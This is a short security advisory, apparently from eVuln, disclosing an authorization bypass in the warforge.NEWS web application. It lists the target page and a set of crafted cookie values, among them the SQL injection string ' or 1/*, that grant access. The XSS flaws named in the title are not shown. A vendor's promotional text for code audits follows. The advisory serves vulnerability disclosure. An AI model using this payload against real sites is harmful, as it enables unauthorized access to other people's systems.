PoC/Exploit for SQL Injection and Multiple XSS in warforge.NEWS

Published Proof of Concept code - SQL Injection and Multiple XSS in warforge.NEWS.

Description
Available
Solution
Not available - check vendor's website

Authorization Bypass Example:

URL: http://[host]/news/index.php

Cookie values:

  • authusername=' or 1/*
  • authaccess=1
  • authemail=qwe@qqwe.com
  • authpassword=any
  • authfirst_name=any
  • authlast_name=any
  • authaccess=3

Order Source Code Audit made by eVuln

Protect your site by source code audit of your website or web application made by our team.The work will be done by experts in website security.

Advisories by vuln type